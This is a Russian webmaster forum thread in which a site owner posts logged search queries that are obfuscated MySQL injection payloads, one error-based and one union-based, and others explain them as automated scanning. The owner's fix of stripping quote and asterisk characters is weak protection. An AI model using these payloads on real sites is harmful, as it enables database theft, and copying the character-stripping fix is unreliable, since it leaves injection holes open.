Попытались взломать или глюк

L
На сайте с 09.05.2012
Offline
98
1031

Добрый вечер. На сайте есть поисковая строка, в котором все запросы записываются в текстовый документ. Сегодня обнаружил запросы:

(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a)

и

999999.9) /**/uNiOn/**/aLl /**/sElEcT 0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39,0x393133353134353632382e39,0x393133353134353632392e39,0x39313335313435363231302e39,0x39313335313435363231312e39,0x39313335313435363231322e39,0x39313335313435363231332e39,0x39313335313435363231342e39,0x39313335313435363231352e39,0x39313335313435363231362e39,0x39313335313435363231372e39,0x39313335313435363231382e39,0x39313335313435363231392e39,0x39313335313435363232302e39,0x39313335313435363232312e39,0x39313335313435363232322e39,0x39313335313435363232332e39,0x39313335313435363232342e39,0x39313335313435363232352e39,0x39313335313435363232362e39,0x39313335313435363232372e39,0x39313335313435363232382e39,0x39313335313435363232392e39,0x39313335313435363233302e39,0x39313335313435363233312e39,0x39313335313435363233322e39,0x39313335313435363233332e39,0x39313335313435363233342e39,0x39313335313435363233352e39,0x39313335313435363233362e39,0x39313335313435363233372e39,0x39313335313435363233382e39,0x39313335313435363233392e39,0x39313335313435363234302e39,0x39313335313435363234312e39,0x39313335313435363234322e39,0x39313335313435363234332e39,0x39313335313435363234342e39,0x39313335313435363234352e39,0x39313335313435363234362e39,0x39313335313435363234372e39,0x39313335313435363234382e39,0x39313335313435363234392e39,0x39313335313435363235302e39,0x39313335313435363235312e39,0x39313335313435363235322e39,0x39313335313435363235332e39,0x39313335313435363235342e39,0x39313335313435363235352e39,0x39313335313435363235362e39,0x39313335313435363235372e39,0x39313335313435363235382e39,0x39313335313435363235392e39,0x39313335313435363236302e39,0x39313335313435363236312e39,0x39313335313435363236322e39,0x39313335313435363236332e39,0x39313335313435363236342e39,0x39313335313435363236352e39,0x39313335313435363236362e39,0x39313335313435363236372e39,0x39313335313435363236382e39,0x39313335313435363236392e39,0x39313335313435363237302e39,0x39313335313435363237312e39,0x39313335313435363237322e39,0x39313335313435363237332e39,0x39313335313435363237342e39,0x39313335313435363237352e39,0x39313335313435363237362e39,0x39313335313435363237372e39,0x39313335313435363237382e39,0x39313335313435363237392e39,0x39313335313435363238302e39,0x39313335313435363238312e39,0x39313335313435363238322e39,0x39313335313435363238332e39,0x39313335313435363238342e39,0x39313335313435363238352e39,0x39313335313435363238362e39,0x39313335313435363238372e39,0x39313335313435363238382e39,0x39313335313435363238392e39,0x39313335313435363239302e39,0x39313335313435363239312e39,0x39313335313435363239322e39,0x39313335313435363239332e39,0x39313335313435363239342e39,0x39313335313435363239352e39,0x39313335313435363239362e39,0x39313335313435363239372e39,0x39313335313435363239382e39,0x39313335313435363239392e39,0x3931333531343536323130302e39 and(0=0

И другие. Всего около 500 запросов. Что это может быть?:mad:

S
На сайте с 30.09.2016
Offline
469
#1

Это обычное сканирование сайта на предмет возможности MySQL-инъекции.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
L
На сайте с 09.05.2012
Offline
98
#2

Не запарился интересно он столько запросов вводить:) Перебрал всевозможные варианты.

CMS то простой самописный,на костылях, по безопасности я полный ноль😒

Придется почаще проверять на вирусы😒 . А то помню очень давно как-то из-за вируса на одном сайте хорошие позиции потерял в Яндексе, так и не смог их вернуть.

S
На сайте с 30.09.2016
Offline
469
#3
leonr:
Не запарился интересно он столько запросов вводить:)

Думаю, не запарился. Дал параметры перебора запросов роботу - и в путь.

L
На сайте с 09.05.2012
Offline
98
#4

Уфф. Надеюсь, не слили базу😒 Что он еще с url творил - секрет.😕

Сергей
На сайте с 20.02.2015
Offline
126
#5

Самописный тяжелее сломать, а вот известные движки постоянно ломают и хвастаются достижениями. Месяц назад, лично один мой заброшенный форум сломали и заняли место админа блокировка стоит по ip к админке, короче я захожу как обычно в админку проверить и удалить всякий спам и вижу: вы заблокированны!!! Хорошо базы старые хостинг хранит. Спамят литовцы в определенную категорию, меняют ip как блокировать хз. Временно отключил регистрацию.

Доработки Opencart, joomla. Продвижение. Проверенный годами хостинг
S
На сайте с 30.09.2016
Offline
469
#6

Смотря какой самописный. Какой-то тяжелее, какой-то проще. Известные движки ломают чаще из-за открытости кода и по той причине, что взлом идёт автоматически, по известной схеме. Но самописные движки зачастую пишутся без учёта требований безопасности, и при целенаправленном взломе последствия могут быть довольно серьёзными.

SeVlad
На сайте с 03.11.2008
Offline
1609
#7
leonr:
Сегодня обнаружил запросы:

Форум-то нафига ломать?! 😡

Для кого придуманы бб-коды?

newkrasno:
Самописный тяжелее сломать

Это эффект неуловимого Джо. На самом деле в самописах дыр больше, чем в пабликах.

Только в пабликах это раззванивается и потом латается. А в самописах продолжает тихо юзаться и никто не никогда не признается.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
L
На сайте с 09.05.2012
Offline
98
#8

До сих пор этот нехороший чел пытается меня взломать. Заходит через IP 77.122.74.7 и 176.99.181.20. По его запросам нашел одну уязвимость, если ввести например: '0=A, можно увидеть по каким столбцам происходит выборка. Сделал replace символов ' и *.

Извиняюсь, что не использовал bb коды, очень редко пишу на форумах, не подумал.))

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий